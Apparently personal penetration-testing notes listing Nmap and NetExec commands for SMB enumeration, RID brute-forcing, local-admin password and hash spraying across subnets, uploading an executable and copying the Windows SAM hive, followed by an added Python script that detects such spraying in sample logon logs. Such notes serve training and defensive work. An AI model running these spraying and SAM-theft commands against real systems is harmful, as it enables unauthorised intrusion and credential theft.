<aside>

When you have reached MS02 via pivoting: to get from MS02 back to my local Kali, tunneling is needed.

Tips

Tools

<aside>

Enumeration

Host Discovery

Port Scanning

Nmap

nmap $IP -Pn -n --open --min-rate 3000 -p-
nmap $IP -sC -sV -p [ports]
nmap $IP -sU --top-ports 10

NetExec

nxc smb $IP -u '' -p '' --users
nxc smb $IP -u '' -p '' --rid-brute
nxc smb $IP -u [user] -p [password]
nxc smb $IP -u [user] -p [password] --users
nxc smb $IP -u [user] -p [password] --groups
nxc smb $IP -u [user] -p [password] --shares
nxc smb $IP -u [user] -p [password] --rid-brute
nxc smb $IP -u [user] -p [password] --rid-brute | grep SidTypeUser
nxc smb $IP -u [user] -p [password] --continue-on-success
nxc smb $IP -u [user] -p [password] --local-auth

# Local Admin Spraying
nxc smb 172.16.5.0/24 -u [user] -p [password] --local-auth
nxc smb 172.16.5.0/24 -u [user] -H [hash] --local-auth

# logged-on-users
nxc smb 10.10.110.0/24 -u [user] -p [password] --logged-on-users

# Upload and download
nxc mssql $IP -u [user] -p [password] --get-file 'C:\Windows\System32\SAM' SAM
nxc mssql $IP -u [user] -p [password] --put-file gp.exe 'C:\Users\Public\gp.exe'
nxc smb $IP -u [user] -p [password] --get-file 'C:\Windows\System32\SAM' SAM
nxc smb $IP -u [user] -p [password] --put-file gp.exe 'C:\Users\Public\gp.exe'
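
The local-admin spraying pattern above (one source trying the same credential against a whole /24 with --local-auth) leaves a distinctive trace in logon telemetry: one source address, one account, many distinct destination hosts within seconds. The following detection script is an added example, not part of the original notes or of the NetExec project. It runs over a constructed, simplified log format (timestamp, destination host, source IP, account, logon type, outcome) that stands in for network logon events (logon type 3) collected centrally; the field layout and the sample lines are assumptions for illustration, not a real Windows event schema.

```python
"""Flag a single source authenticating against many hosts in a short window."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample log lines (assumed layout, not from any real environment):
# timestamp  destination_host  source_ip  account  logon_type  outcome
SAMPLE_LOGS = """
2024-05-01T10:00:01 WS01 10.10.110.50 Administrator 3 FAILURE
2024-05-01T10:00:02 WS02 10.10.110.50 Administrator 3 FAILURE
2024-05-01T10:00:02 WS03 10.10.110.50 Administrator 3 SUCCESS
2024-05-01T10:00:03 WS04 10.10.110.50 Administrator 3 FAILURE
2024-05-01T10:00:03 WS05 10.10.110.50 Administrator 3 FAILURE
2024-05-01T10:00:04 WS06 10.10.110.50 Administrator 3 SUCCESS
2024-05-01T10:05:00 FS01 10.10.110.21 jdoe 3 SUCCESS
2024-05-01T10:06:00 FS01 10.10.110.21 jdoe 3 SUCCESS
2024-05-01T11:00:00 WS07 10.10.110.50 Administrator 3 FAILURE
""".strip()


@dataclass(frozen=True)
class LogonEvent:
    ts: datetime
    host: str
    src_ip: str
    account: str
    logon_type: int
    outcome: str


@dataclass
class SprayAlert:
    src_ip: str
    account: str
    window_start: datetime
    hosts_attempted: tuple   # distinct destination hosts inside the window
    hosts_succeeded: tuple   # subset where the logon succeeded (the real risk)


def parse_logs(text):
    """Parse the whitespace-separated sample format into LogonEvent records."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, host, src, acct, ltype, outcome = line.split()
        events.append(LogonEvent(datetime.fromisoformat(ts), host, src,
                                 acct, int(ltype), outcome))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_hosts=5):
    """Return one alert per (source, account) that touched >= min_hosts distinct
    hosts with network logons inside any sliding time window."""
    by_key = defaultdict(list)
    for e in events:
        if e.logon_type == 3:            # network logons only (SMB, etc.)
            by_key[(e.src_ip, e.account)].append(e)

    alerts = []
    for (src, acct), evs in by_key.items():
        evs.sort(key=lambda e: e.ts)
        best = None                      # widest qualifying window for this key
        left = 0
        for right in range(len(evs)):
            # shrink from the left until the span fits inside the window
            while evs[right].ts - evs[left].ts > window:
                left += 1
            span = evs[left:right + 1]
            hosts = {e.host for e in span}
            if len(hosts) >= min_hosts and (best is None or len(hosts) > len(best[1])):
                succeeded = {e.host for e in span if e.outcome == "SUCCESS"}
                best = (evs[left].ts, hosts, succeeded)
        if best is not None:
            alerts.append(SprayAlert(src, acct, best[0],
                                     tuple(sorted(best[1])), tuple(sorted(best[2]))))
    return alerts


if __name__ == "__main__":
    for a in detect_spray(parse_logs(SAMPLE_LOGS)):
        print(f"{a.src_ip} sprayed '{a.account}' against {len(a.hosts_attempted)} hosts "
              f"from {a.window_start}; succeeded on {', '.join(a.hosts_succeeded) or 'none'}")
```

On the sample data the script raises a single alert for 10.10.110.50 spraying Administrator across WS01 to WS06 (with successes on WS03 and WS06, which is where a shared local-admin password is the real finding), while jdoe's repeated logons to one file server stay quiet. The successful subset is reported separately because a spray with even one success deserves a different response than one that only produced failures.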

Kerbrute

Kerberos 88

Bloodhound

Collectors